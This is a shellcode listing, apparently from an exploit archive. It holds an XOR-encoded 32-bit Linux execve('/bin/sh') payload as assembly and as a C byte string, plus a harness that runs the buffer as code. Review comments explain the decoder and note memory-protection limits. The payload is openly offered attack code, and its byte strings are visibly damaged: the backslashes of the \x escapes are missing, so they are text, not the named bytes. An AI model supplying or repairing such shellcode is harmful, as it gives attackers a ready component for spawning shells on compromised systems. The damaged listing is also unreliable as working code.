# Title : linux/x86 execve /bin/sh xor encrypted 55 bytes
# Published : 2004-09-12
# Author : n/a
/*
# Self-decoding stub for 32-bit Linux/x86, AT&T syntax (disassembly-style listing).
# Layout: decoder and two int $0x80 system calls, followed by 8 XOR-encoded
# bytes and the 4-byte key they are decoded with.
# Analysis notes:
#  - The "encryption" is a single 32-bit XOR with a key stored next to the data,
#    so it only hides the path string from plain string matching; the decoder
#    itself is a fixed byte sequence and can be matched as-is.
#  - The two xor-to-memory instructions rewrite bytes inside the code's own
#    buffer, so the stub needs memory that is both writable and executable.
.file "xor-encrypted shellcode"
.version "1.0"
.text
.align 4
# NOTE(review): these directives export and type `main`, but the only label
# defined below is `_start`.
.globl main
.type main,@function
_start:
xorl %eax,%eax          # eax = 0
jmp 0x22                # forward to the call at the end (jmp/call/pop); 0x22 is the raw displacement (bytes eb 22), not a label
popl %ebx               # ebx = return address pushed by the call = address of the data bytes
movl 8(%ebx),%edx       # edx = dword at data+8, the XOR key
xor %edx,(%ebx)         # decode data[0..3] in place
xor %edx,4(%ebx)        # decode data[4..7] in place
xor %edx,%edx           # edx = 0, third system-call argument
movl %ebx,0x8(%esp)     # two-entry pointer array on the stack: [esp+8] = pointer to decoded data
movl %edx,0xc(%esp)     # [esp+12] = 0, array terminator
movb $0xb,%al           # eax = 11, execve on Linux i386
leal 0x8(%esp),%ecx     # ecx = address of the pointer array
int $0x80               # execve(ebx, ecx, edx)
xorl %ebx,%ebx          # reached only if execve returned: ebx = 0
movl %ebx,%eax
incl %eax               # eax = 1, exit on Linux i386
int $0x80               # exit(0)
call -0x27              # pushes the address of the following data and returns to the popl; -0x27 is the raw displacement (bytes e8 d9 ff ff ff)
# Data: 8 encoded bytes, then the key 0x41414141. The 8th encoded byte is 0x41,
# which decodes to 0x00 and terminates the string.
# NOTE(review): the backslash of each \x escape is missing here (page-extraction
# damage); as printed this is ASCII text, not the byte values it names.
.string "x6ex23x28x2fx6ex32x29x41x41x41x41x41"
*/
/* Label printed by the harness in main(). */
#define NAME "encrypted"
/*
 * Byte form of the assembly listing in the comment above: 43 bytes of
 * decoder/system-call stub, then 8 XOR-encoded bytes and the 4-byte key
 * (55 bytes, matching the title).
 * NOTE(review): as printed here the backslash of every \x escape is missing
 * (page-extraction damage), so these literals are ASCII text such as "x31xc0"
 * rather than the byte values they name.
 */
char code[]=
"x31xc0xebx22x5bx8bx53x08x31x13x31x53x04x31xd2x89"
"x5cx24x08x89x54x24x0cxb0x0bx8dx4cx24x08xcdx80x31"
"xdbx89xd8x40xcdx80xe8xd9xffxffxff"
"x6ex23x28x2fx6ex32x29x41" /* "/bin/sh" and its terminating zero byte, each XORed with 0x41 */
"x41x41x41x41"; /* XOR key dword 0x41414141 read by the decoder (originally labelled "Conversion chars") */
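/*
 * Test harness: prints NAME and the byte count of code[], then calls the
 * buffer as if it were a function.
 *
 * code[] is an ordinary initialized array, so it lives in writable data.
 * The indirect call only proceeds where that memory is also executable; with
 * non-executable data pages (NX / W^X) it faults at the first instruction
 * fetch, and the stub's in-place decode additionally needs the same pages to
 * stay writable.
 *
 * Returns 0 if the call comes back.
 */
int main(void)
{
    int (*funct)(void);

    /* Data pointer reinterpreted as a function pointer; nothing checks the buffer's contents. */
    funct = (int (*)(void)) code;

    /* strlen() yields size_t, so cast to match %d; the count stops at the first zero byte in code[]. */
    printf("%s shellcode\n\tSize = %d\n", NAME, (int)strlen(code));

    (void)(*funct)();
    return 0;
}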